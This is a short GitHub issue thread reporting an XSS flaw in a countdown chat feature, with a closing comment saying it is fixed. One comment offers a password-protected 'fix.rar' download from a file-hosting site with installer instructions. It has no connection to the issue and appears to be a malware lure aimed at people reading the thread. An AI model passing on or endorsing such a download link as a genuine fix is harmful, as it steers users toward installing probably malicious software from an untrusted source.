### ISSUE TITLE
Sanitize chat messages in countdown

### ISSUE THREAD

**Issue by KaspianDev** [PixelVerseIT/hackclub-arcade-tracker-htmlcssjs#6]
Countdown is currently vulnerable to XSS, anyone can inject scripts and html tags inside the comments (i only tested a harmless <b\> tag but most likely scripts also do work).

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by haydenkong** [comment]
Fixed!
